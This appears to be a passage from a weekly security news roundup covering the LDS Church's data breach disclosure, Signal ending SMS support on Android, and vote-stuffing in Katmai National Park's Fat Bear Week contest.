The Church of Jesus Christ of Latter-Day Saints (often known as LDS or the Mormon Church) revealed this week that hackers breached its systems in late March. In a statement, the church said that it did not disclose the intrusion until now at the request of law enforcement. While LDS says that donation histories and payment card information were not accessed, the data may include “your username, membership record number, full name, gender, email address(es), birthdate, mailing address, phone number(s), and preferred language.” According to the church, federal authorities believe the breach was “part of a pattern of state-sponsored cyberattacks aimed at organizations and governments around the world that are not intended to cause harm to individuals.”

Signal users on Android collectively groaned this week after the Signal Foundation announced that it would no longer support SMS and MMS messaging in the app. The convenient feature allowed Android users to message anyone, regardless of whether they were on Signal, through the app. (Signal’s iOS version did not support this feature.) Signal said in its announcement that the move was due to the inherent insecurity of SMS and the potential for users to forget that they weren’t sending end-to–end encrypted messages to non-Signal contacts. Signal’s lead Android developer, Greyson Parrelli, added in a forum post that part of the reason Signal was ditching SMS and MMS was because Signal “doesn’t play well” with RCS, Google’s new messaging protocol.

Not even bear-based elections are safe these days. On Sunday, officials behind Katmai National Park’s annual Fat Bear Week contest discovered that someone had monkeyed with the vote by flooding it with some 9,000 fake ballots in favor of a bear named 435. Fat Bear election integrity officials soon discovered thousands of fake email addresses linked to the bogus ballots, corrected the tally, and added a captcha to the site to fend off the spammers. Ultimately, a 1,400-pound grizzly aptly named 747 overtook 435 by some 7,000 votes and won the competition. “Bears don’t actually get anything from competing in or winning Fat Bear Week,” Amber Kraft, who helps run the competition at the park, told _Bloomberg_. “Despite which bear wins the most votes in the Fat Bear Week competition, they are all winners.”

Tag

#android